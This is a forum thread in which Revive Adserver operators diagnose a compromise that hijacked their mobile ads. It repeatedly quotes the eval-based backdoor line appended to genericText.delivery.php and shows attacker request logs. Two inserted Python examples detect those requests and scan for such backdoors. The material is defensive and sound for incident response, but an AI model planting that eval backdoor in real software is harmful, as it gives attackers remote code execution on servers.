Snaggy

Mobile ads have been hijacked


Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
Thank you for your assistance!

I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the Revive installation.
@Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?


My genericText.delivery file has this line...

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6f3ba4fbec5bfe3817fc319f3031fdaa'){@eval($_REQUEST['zoneId']);}
?>

I take it that this should be deleted?

6 hours ago, Ian vM said:

@tvvpmi which version are you running? Did you upgrade from an older version in the past too?

The last one, 4.1.4.

I have upgraded from a prior version. But this installation comes from an old installation, 2.8 series.


I have modified the fc.php script to log POST parameters. I'm waiting now for a new POST to check what we are receiving and to try to reproduce the attack.

3 hours ago, sunech said:

Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
Thank you for your assistance!

I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the Revive installation.
@Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

Same here.

From stat genericText.delivery.php
 2018-12-22 08:51:50.724940460 +0100

15 minutes ago, tvvpmi said:

Same here.

From stat genericText.delivery.php
 2018-12-22 08:51:50.724940460 +0100

Like in @snaggy's case, this line has been added at the end of genericText.delivery.php:

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

16 hours ago, tvvpmi said:

I have modified the fc.php script to log POST parameters. I'm waiting now for a new POST to check what we are receiving and to try to reproduce the attack.

I have more info. I have just received another attack. I have the POST parameters the attacker is using. Is any of the admins interested in receiving them?


We are having the exact same problem and symptoms:

  • Injection in the zones table of the Revive database.
  • The file genericText.delivery.php has been compromised.
  • I found the following suspicious entries in the NGINX log-file:

176.31.187.82 - - [17/Dec/2018:10:07:33 +0100] "POST /adxmlrpc.php HTTP/1.1" 200 11329 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 0.210 x.x.x.x -
176.31.187.82 - - [17/Dec/2018:10:07:36 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 76 "https://google.com/serach?q=https://adsserver.xxx/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)" 0.439 x.x.x.x -

Running an upgraded Revive 4.1.3. I have been upgrading every version since 2011 (when it was still called OpenX).
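Detection logic for the two log entries quoted above, added here as an example and not code from this thread or from Revive. It assumes the nginx combined log format shown in the post and runs over constructed sample lines that use documentation addresses instead of the reported IP:

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in the nginx format quoted above; the addresses are
# documentation ranges, not the IP reported in the post.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Dec/2018:10:07:33 +0100] "POST /adxmlrpc.php HTTP/1.1" 200 11329 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) Chrome/70.0.3538.77 Safari/537.36" 0.210 x.x.x.x -
203.0.113.10 - - [17/Dec/2018:10:07:36 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 76 "https://google.com/serach?q=x" "AdsBot-Google (+http://www.google.com/adsbot.html)" 0.439 x.x.x.x -
198.51.100.7 - - [17/Dec/2018:10:08:01 +0100] "GET /www/delivery/ajs.php?zoneid=3 HTTP/1.1" 200 1540 "https://example.org/" "Mozilla/5.0" 0.012 x.x.x.x -
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(rec["target"])
    rec["path"], rec["query"] = url.path, parse_qs(url.query)
    return rec

def is_generic_text_post(rec):
    """The delivery call from the thread: a POST to fc.php selecting the genericText
    plugin, i.e. the file that carried the appended eval() line."""
    return (rec["method"] == "POST" and rec["path"].endswith("/www/delivery/fc.php")
            and "bannerTypeText:oxText:genericText" in rec["query"].get("script", []))

def find_suspicious(log_text, window_s=60):
    """Return (ip, iso timestamp, reason) for each request worth investigating."""
    findings, last_xmlrpc = [], {}   # last_xmlrpc: ip -> time of last POST /adxmlrpc.php
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        if rec["method"] == "POST" and rec["path"].endswith("/adxmlrpc.php"):
            last_xmlrpc[rec["ip"]] = rec["ts"]
        if not is_generic_text_post(rec):
            continue
        reason = "POST fc.php for genericText"
        prev = last_xmlrpc.get(rec["ip"])
        if prev is not None and (rec["ts"] - prev).total_seconds() <= window_s:
            reason += f" within {window_s}s of POST adxmlrpc.php"
        if rec["ua"].startswith("AdsBot-Google"):
            reason += "; claims AdsBot-Google user agent"
        findings.append((rec["ip"], rec["ts"].isoformat(), reason))
    return findings
```

The AdsBot check only flags the claimed user agent; confirming whether the source really is Google's crawler needs a reverse DNS lookup that this offline example does not perform.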


Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

Probably it has been modified, adding a line like this at the end:

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

You have to remove it. 

Also, you have to search the images folder for some PHP script ... and remove it. Perhaps you can send it privately to @Ian vM.

Clean the prepend code of your zones ... via SQL or through the Revive backend. Search for iframes and JavaScript code.

Disable PHP execution in the images folder, or move the images folder to "another place", as they are static files, and serve them through another subdomain. You don't need PHP for them.
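A scanner for the file checks in this post and for the stat observation earlier in the thread (the inode change time revealing an edit even though the mtime matched the installation), added here as an example rather than the thread's or Revive's own code. The directory layout plugins/bannerTypeText/oxText and www/images, the signature regexes and the fixture contents are assumptions:

```python
import os
import re
import tempfile

# Signatures of the line appended to genericText.delivery.php in this thread: an
# eval() fed from a request parameter, and the md5-gated check guarding it.
BACKDOOR_PATTERNS = {
    "eval of request data": re.compile(r"@?eval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b"),
    "md5-gated request check": re.compile(
        r"md5\s*\(\s*\$_(REQUEST|GET|POST)\[[^\]]+\]\s*\)\s*==\s*'[0-9a-f]{32}'"),
}

def scan_php_text(text):
    """Names of the signatures found in a PHP source string."""
    return [name for name, pat in BACKDOOR_PATTERNS.items() if pat.search(text)]

def timestamp_mismatch(path, tolerance_s=60):
    """utime() can backdate mtime, but ctime still records when that happened."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > tolerance_s

def scan_tree(root, tolerance_s=60):
    """Walk plugins/ and www/images under root; return (relative path, reasons)."""
    findings = []
    for sub in ("plugins", os.path.join("www", "images")):
        for dirpath, _, files in os.walk(os.path.join(root, sub)):
            for name in files:
                if not name.lower().endswith(".php"):
                    continue
                path = os.path.join(dirpath, name)
                # No PHP at all belongs under the images folder.
                reasons = [] if sub == "plugins" else ["php file in images folder"]
                with open(path, encoding="utf-8", errors="replace") as fh:
                    reasons += scan_php_text(fh.read())
                if timestamp_mismatch(path, tolerance_s):
                    reasons.append("ctime newer than mtime (possible backdating)")
                if reasons:
                    findings.append((os.path.relpath(path, root), reasons))
    return findings

def build_demo_tree():
    """Constructed fixture: a clean delivery file and one with the appended line."""
    root = tempfile.mkdtemp()
    plug = os.path.join(root, "plugins", "bannerTypeText", "oxText")
    os.makedirs(plug)
    with open(os.path.join(plug, "oxText.delivery.php"), "w") as fh:
        fh.write("<?php\nfunction deliver($zone) { return $zone; }\n")
    bad = os.path.join(plug, "genericText.delivery.php")
    with open(bad, "w") as fh:
        fh.write("<?php\n// plugin code\nif(isset($_REQUEST['t'])&&md5($_REQUEST['t'])=='"
                 + "0" * 32 + "'){@eval($_REQUEST['z']);}\n")
    os.utime(bad, (0, 0))    # backdate atime/mtime; ctime still becomes "now"
    return root
```

Run scan_tree against the Revive installation root; a file that only trips the timestamp check deserves a diff against a pristine copy of the same plugin version.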


Thank you @tvvpmi. That did the trick!

I've been searching through a database dump for traces of suspicious JavaScript or iframes, but they only tampered with one specific ad for some reason. There were no PHP files in the images folder though.
Like you suggested, I've removed the ability to execute PHP files in the images folder, and the installation hasn't been compromised since.


I had the same issue. The injection also changed my DB structure for the append column in the ox_zones table. No other files were modified, but I do believe the code put in the file did the other modification to put in the code that was added to the append column.


I did also have another issue where an intruder logged into our system (the log said as me) and added the mobile redirection code directly to the ad creative. I added a different admin user and removed my old one... I also reinstalled Revive Adserver.

I haven't seen any traffic since then of people poking around my admin area. Just tonight someone tried to do the fc.php injection. I already have PHP execution disabled in my images folder. The difference now is the permissions on the plugins folder. They are unable to write to that file now.

